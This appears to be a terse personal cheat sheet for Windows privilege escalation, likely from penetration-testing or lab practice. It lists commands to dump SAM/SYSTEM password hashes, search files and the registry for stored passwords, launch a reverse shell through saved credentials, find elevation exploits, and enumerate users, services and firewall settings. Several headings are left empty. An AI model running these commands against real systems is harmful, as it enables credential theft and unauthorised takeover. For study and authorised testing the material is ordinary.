If SYSTEM or SAM found in winPEAS use one of this:
windows/system32/config/SAM(or SYSTEM) is where password hashes are located
If AD ntds.dit will have the database
To get the hash:
impacket-secretsdump -sam SAM -system SYSTEM local
python2 pwdump.py /tools /SYSTEM /tools/SAM
If starts with 3186 it is an empty string
Automatic
Wesng:
python3 wesng.py /tools/systeminfo.txt -i 'Elevation of Privilege' --exploit-only | more
Manual:
Get stored passwords:
runas /savecred /user:admin C:\Path\to\reverse.exe
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml
findstr /SIM /C:"GitLab" *.txt #Replace GitLab with any keyword
System info (cmd):
Chimichurri for Windows 2008 R1 & R2, Windows Vista and Windows 7
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
Check files with pass in name or .config in current directory recursively:
Run in temp or suspicious program directory
dir /s *pass* == *.config
List all scheduled tasks:
schtasks /query /fo LIST /v
To check all processes running:
Check password in registry:
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
Get patches:
To get disks:
To check privileges:
To check groups involved in:
To check users:
Can also check specific user with:
net user administrator
We can check group details from above command with:
To look at arp table:
Print route:
For active connections:
Search password (In the directory)
findstr /si password *.txt *.ini *.config
Check Firewall and AV
To check windows defender
Check all processes
sc queryex type= service
Check firewall :
netsh advfirewall firewall dump
netsh firewall show state
netsh firewall show config
